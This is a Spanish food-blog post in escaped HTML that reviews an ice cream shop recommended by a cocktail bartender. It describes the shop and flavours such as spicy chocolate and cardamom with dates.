Esta helader\u00eda lleg\u00f3 a nosotros gracias a Dami\u00e0\u00a0 Mul\u00e0\u00a0, nuestro cocktailman en nuestro \u00faltimo taller privado de c\u00f3cteles. Y es que siempre hay que hacerle caso a un coctelero cuando de sabores se trata, y \u00e9l lleg\u00f3 a la helader\u00eda a trav\u00e9s de un amigo italiano. Y ya, sabiendo esto, no quedaba m\u00e1s\u00c2\u00a0duda: hab\u00eda que probarla.<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/bcnkitchen.com\/blog\/_prueba\/wp-content\/uploads\/IMG_5231.jpg\"><img loading=\"lazy\" decoding=\"async\" alt=\"born restaurantes\" src=\"https:\/\/bcnkitchen.com\/blog\/_prueba\/wp-content\/uploads\/IMG_5231-300x225.jpg\" width=\"300\" height=\"225\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>El espacio merece una visita: peque\u00f1o, encantador, y con un mostrador de helados que te llena de dudas sobre qu\u00e9 sabor pedir. \u00bfTiramis\u00fa, con todo el bizcocho y cacao por encima? \u00bfCrema catalana, bien quemada? \u00bfEl cheesecake, con streusel y mermelada? Aunque todo vaya a gustos, admitir\u00e9 que prob\u00e9 dos sabores y los recomendar\u00eda a cualquiera: chocolate picante (bien intenso primero, y despu\u00e9s con sabor picante) y el de cardamomo y d\u00e1tiles (buen\u00edsimo y con un sabor a cardamomo irresistible). M\u00e1s all\u00e1 de los helados, tienen cr\u00e0\u00aapes, gofres, brioches (recordad c\u00f3mo deber\u00eda comerse el helado seg\u00fan los sicilianos), capuccino, chocolate caliente y affogatto.
